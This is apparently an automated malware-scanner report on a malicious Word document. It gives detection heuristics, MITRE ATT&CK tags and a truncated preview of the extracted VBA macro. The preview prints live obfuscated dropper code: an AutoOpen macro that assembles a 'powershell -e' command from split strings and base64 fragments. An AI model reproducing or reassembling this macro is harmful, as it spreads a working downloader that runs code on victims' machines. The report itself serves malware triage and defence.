MALICIOUS
184
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro that utilizes the Shell() function. This indicates the document is designed to execute arbitrary code, likely downloading and running a secondary payload. ClamAV detection further confirms its malicious nature.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6364202-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6364202-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11082 bytes |
SHA-256: c22f941ec63c8aa51237c855a8f3186114cc0c06320697daaa65186142681c15 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 29 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "mCkrZzdFc"
Function palzSaHtE()
oWpWEKB = Mid("KmUSQAxADEAOQB+ADQANQBTADEAMQAxAF8AOQA4AEkAMQAwADYAfgAxADAAMQBPADkAOQBfADEAMQA2AEkAMwAyAF8AOAAzAH4AMQAyADEAfgAxADEANQBTADEAMQA2AF8Adz1Pmicz9KsFA6N2di", 4, 128)
rXNTaBYiszK = Mid("4f3sbB7SRsNJKJ2dV2EDqCzbra4vozADAAMgB1ADkANwBEADkAOQB+ADQANgBtADEAMAAwAH4AMQAwADEASQA0ADcARAA4ADUAbRz1wEj", 31, 69)
wOQjqJd = Mid("ntLkHCMGhQSwA2rCHY49Ll9i6wr95WwAxADAAMQBfADEAMAA4AHUAMQAwADgARAA1ADkARAAzADYASQAxADEAOQB+ADEAMAAxAG0AOQA4AG0AOQA5AE8AMQAwADgAbQAxADAANQB7ADEAMAAxAF8AMQAxADAAewAxADEANgBPADMAMgBJADYAMQBfADMAMgB7ADEAMQAwAH4AMQAwADEAcpC", 31, 183)
lUocPcMN = Mid("0Y56k2NMJ8UFDQAewAzADIAewA1ADQAOwA1ADMAewA1ADMAfgA1ADEAfgA1ADQASQA0ADEAbQA1ADkAUwAzADYAbQAxADEAMgTzC8niYiGu1Jz", 13, 85)
dasMz = Mid("LzqDADkAOQBtADEAMAA0AFMAMQAyADMAewAxADEAOQA7ADEAMQA0AHUAMQAwADUAdQAxADEANgBfADEAMAAxAG0ANAA1AE8AMQAwADQAewAxADEAMQBEADEAMQA1AH4AMQAxADYATwAzADIbLJB7nJzZ2NE3D9j2", 5, 139)
jDRAVuUCWHr = Mid("tMIdT9DzN2dR8imzcUTQAMQAxADEAewAxADEANABEADEAMAAwAF8AMQAxADEAOwA0ADUAdQAxADEANgBtADEAMAAxAHUAMQAwADkAdQAxADEAMgA7ADEAMAA4AHUAMN7Ym0NvJp3ciibiGnwM9", 20, 107)
oaFpKQnGph = Mid("tSvYE6kCHaIJADYAUwAzADIATwAxADEANAB7ADkDzzWw", 13, 27)
LaXihUhMuE = Mid("r6tkQjP3wrH2djb0jMQAwADEAbQAxADEANQBJADEAMQA1ADsAMwAyAEQAMwA2AHzNCGGkrs6ViR1i8jV4", 18, 46)
BUVwivWCOGU = Mid("Gset %zoMrjrYWm%=w^er^s&&set %wqUiuKmAI%=falYLhhOP&&set %palzSaHtE%=p^o&&se7Ei5AzY2HEol1K0Jc", 2, 74)
KJsnJq = Mid("Ki30OjhTACcAIAAnACcAIAApACAAIgAgACsAIABbAFMAVAByAEkATgBnAF0AKAAnADMANgBPADEAMQA5AF8AMQAxADUAUwA5ADkAfgAxADEANABPADEAMAA1AHUAMQAxADIAfgAxADEANgBEADMAMgBTADYAMQBEADMAMgBtADEAMQAwAUjE7H", 8, 170)
WqOzYRP = Mid("bi1cSmDR49mDiSDr2hWETCRXvQBTADMAMgB7ADQAMwB7ADMAMgB1ADMAOQA7ADQANgBPADEAMAAxAH4AMQAyADAATwAxADAAMQA7ADMAOQBJADUAOQBtADEAMAAyAH4AMQAxADEATwAxADEANABEADEAbVA9dq", 26, 127)
URtazUKn = Mid("vwawpQYRXFHz49qwwIhZ4j4zADYAfgAYiWJB", 24, 8)
uMrGThuWao = Mid("zXThIUpANwB1ADEAMQAwAH4AMQAwADAAUwAxADEAMQBTADEAMAA5AG0ANQA5AF8AMwA2AHsAMQAxADcAOwAxADEANABEADEAMAA4AG0AMQAxADUARAAzADIAUwA2ADEAbQAzADIAUwAzADkASQAxADAANABfADEAMQA2ADsAMQAxADYAewAxADQSdh2q57UvD7", 8, 175)
EMjVc = Mid("KzG0AMQAwADEAbQAxADEAOQBTADQANQA7ADEAMQAxAEQAOQA4AEQAMQAwADYARAAxADAAMQBTADkAOQB1ADEAMQA2AHUAMwAyAFMANAA1AEkANgA3AH4AMQAxADEAbQAxADAAOQB7ADcAOQBtL1kwol3XT5drDC", 3, 143)
muVjFaKPL = Mid("tS5Jk&&set %qOlMVhCkR%=hel^l&&set %wTtCEjitv%=AHdNrHmMw&&!%palzSaHtE%!!%zoMrjrYWm%!!%qOlMVhCkR%! -e IAAuACgAIAAkAFYAKdS9d9wHXK7bvwKw", 6, 111)
WTndRGr = Mid("9Y1wErH51pMOMjVTrHAA5ADgATwAxADAANgBTADEAMAAxAHUAOQA5AHUAMQAxL4db1aTUIEuGbDbOOEK", 20, 42)
Gvofkth = Mid("k1hj5a3svS3B1ADkANwB1ADEAMQLb9lXPDGzL0fhOMI4pFwUjEz2c", 12, 16)
ZjTWZo = Mid("TFukiMQAwADEAfgAxADAAOQBTADQANgBfADcAOAB7ADEAMAAxAG0AMQAxADYAUwA0ADYAfgA4ADcARAAxADAAMQBEADkAOAB7ADYANwBJADEAMAA4AG0AMQAwADUAUwAxADAAMQA7ADEAMQAwAEkAMQAxADYAbQA1ADkARAAzADYAOwAxlUS26", 6, 172)
QTluDIjmk = Mid("Vs5UaYGO4wYD6WjX0VGAxADEAMgBEADMAMgB+ADQAMwB7ADMAMgBtADMAOQBfADkAMgB+ADMAOQB7ADMAMgBEADQAMwB+ADMAMgBJADMANgBTADEAMQAwAH4AOQA3AEQAMQAwADkAdQAxADAAMsdmKBjkomlITDBH", 20, 127)
XSDSjF = Mid("cTPFY6DG0KsliIfAF8AMQAxADcAdQAxADEANAB7ADEAMAA4AEkAMQAxADUAXwA0ADEAfgAxADIAMwB1ADEAMQA2AFMAMQAxADQAOwAxADIAMQBJADEAMgAzAEkAMwA2AFMAMQAxADkAbQAxADAAMQB+ADkAOABEADkAOQBJADEAMAA4AFMAMQAwADUAfgAxADAAQ6KNz2kHJjiKoZGEH", 16, 180)
fTFir = Mid("OJWlNfEEDSbEjb7ADEAMQA2ADsAMQAwADQAUwA0ADEARAA1ADkAXwA4ADMATwAxADEANgBtADkANwB7ADEAMQA0AEQAMQAxADYATwA0ADUATwA4ADAAfgAxADEANABJADEAMQAxAH4AOQA5AEkAHbQ3kd", 15, 133)
oapYEszoBMb = Mid("OcGtATwAzADYAdQA5ADUATwA0ADYAfgA2ADkAXwAxADIAMABEADkAOQBtADEAMAAxAG0AMQAxADIAfgAxADEANgBtADEAMAp5vE7r", 5, 91)
jkQVUNq = Mid("4VuCAX8sspsTSprRAFQAbwBTAHQAcgBJAE4ARwAoACkAWwAxACwAMwBdACsAJwBYACcALQBqAE8AaQBOACcAJwApACAAKAAgACIAJAAoACAAcwBFAHQALQBWAEEAcgBpAEEAYgBsAGUAIAAnAE8ARgBwz38CioQhNiYWzJWiiF5w", 17, 135)
YLzklaCjDo = Mid("vdSw33mFmRk8
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.